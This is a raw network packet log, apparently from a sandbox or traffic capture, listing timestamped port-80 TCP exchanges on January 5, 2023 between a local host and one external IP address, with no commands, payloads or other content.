                                                                                                                                                                                    Jan 5, 2023 08:58:23.876157999 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.876203060 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.876224041 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.876243114 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.876282930 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.876322985 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.876327038 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.876359940 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.877990961 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.878035069 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.878103018 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.882540941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.882567883 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.882591963 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.882612944 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.882662058 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.882723093 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883182049 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883239985 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883265018 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883287907 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883308887 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883311033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883333921 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883346081 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883358002 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883379936 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883380890 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883404016 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883421898 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883961916 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.883991957 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884023905 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884047985 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884057999 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884071112 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884087086 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884095907 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884104967 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884120941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884143114 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884165049 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884183884 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884207964 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884572029 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884613037 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884648085 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884680033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884696960 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884704113 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884718895 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884727001 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884749889 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884773016 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884790897 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884793997 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.884818077 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.908970118 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.909125090 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.909176111 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.909221888 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.909265995 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.909265041 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.909331083 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.909331083 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915432930 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915529966 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915606022 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915663004 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915677071 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915749073 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915819883 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915821075 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915889978 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915895939 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.915967941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916028976 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916075945 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916085958 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916127920 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916141033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916196108 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916249990 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916294098 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916304111 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916346073 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916359901 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916414976 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916470051 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916515112 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916531086 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916589975 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916601896 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916672945 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916743994 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916795015 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916811943 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916867018 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916884899 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.916955948 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917026043 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917077065 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917126894 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917128086 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917184114 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917248964 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917294979 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917309046 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917351007 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917366982 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917435884 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917505980 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917557001 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917577028 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917623997 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917645931 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917714119 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917798042 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917853117 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917870998 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917931080 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917942047 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.917994976 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918052912 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918097973 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918107033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918165922 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918170929 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918234110 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918303967 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918356895 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918371916 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918418884 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918442011 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918510914 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918577909 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918632984 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918643951 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918699980 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918787003 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918863058 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918935061 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.918988943 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919004917 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919051886 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919071913 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919130087 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919188023 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919239998 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919251919 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919296980 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919310093 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919380903 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919449091 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919497967 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919513941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919574022 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919580936 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919646025 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919713020 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919773102 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919783115 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919831991 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919852018 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919914007 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.919984102 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920036077 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920044899 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920092106 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920113087 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920171022 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920234919 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920286894 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920300007 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920344114 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920356035 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920419931 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920490026 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920542955 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920563936 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920610905 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920633078 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920697927 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920767069 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920813084 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920830965 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920881987 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920902967 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.920970917 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921042919 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921102047 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921109915 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921161890 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921181917 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921242952 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921304941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921353102 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921360016 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921401024 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921415091 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921473026 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921530962 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921531916 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921586990 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921642065 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921685934 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921696901 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921736956 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921751022 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921806097 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921860933 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921905994 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921917915 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921964884 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.921972990 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922028065 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922082901 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922132969 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922137976 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922183037 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922193050 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922246933 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922302008 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922343016 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922357082 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922399998 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922414064 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922468901 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922523022 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922564983 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922579050 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922621012 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922633886 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922689915 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922770977 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922818899 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922826052 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922868013 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922883987 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922940016 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.922993898 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923041105 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923049927 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923093081 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923106909 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923161030 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923218012 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923265934 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923274040 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923316956 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923330069 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923388004 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923443079 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923489094 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923499107 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923542023 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923557043 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923610926 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923666000 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923711061 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923721075 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923762083 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923777103 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923832893 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923890114 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923934937 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923944950 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.923988104 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.924001932 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926450968 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926493883 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926532984 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926565886 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926572084 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926597118 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926605940 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926628113 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926629066 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926656961 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926683903 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.926722050 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.941339970 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.941392899 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.941442013 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.941488028 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.941524982 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:23.941528082 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:23.941557884 CET4973780192.168.2.4188.114.97.3
